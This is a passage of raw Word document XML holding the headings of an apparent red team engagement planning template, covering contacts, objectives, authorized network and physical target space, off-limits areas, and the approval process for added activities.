        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>An Engagement Contact List (name, role, phone, email, office location)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2CACCB" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ECG personnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEDA82F" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>White Cell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B59F502" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Trusted Agents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651910B6" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Red Team Lead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA2FECC" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Red Tech Lead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41158212" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Engagement Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712BBB96" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conditions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C85B89" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Threat level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626C5BED" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Targeted objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720F8609" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Targets of opportunity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5895F989" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Measures of success/failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C92D6C3" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Authorized Target Space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7845B015" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24810D24" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The IP boundaries of the event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E1ED22" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Domains and/or workgroups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4752D6AA" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Specific off-limits areas and resources (non-target intellectual property file share)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50022321" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Off-limits machines, networks, equipment, or applications (blacklist)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0A8DFD" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Maintenance windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F61D6C" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Physical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D36B1D" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Areas of the campus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC0F7D3" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Buildings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF02DA5" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Offices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F140488" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Off-limits areas (e.g., the emergency services sector of a medical complex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFEBD54" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Off-limits materials within the target space (e.g., sensitive documents or equipment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B23D3F" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorized Actions: Types of activities approved for the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>engagement</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="40E46BEF" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Restricted Actions: Types of activities restricted during the engagement (if any)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160D85B2" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">The process for requesting approval of additional activities during engagement </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>execution</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1FCEB749" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Approval process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585A3925" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Points of contact (name, role, phone, email, office location)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184F212D" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alternate POC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB881EE" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
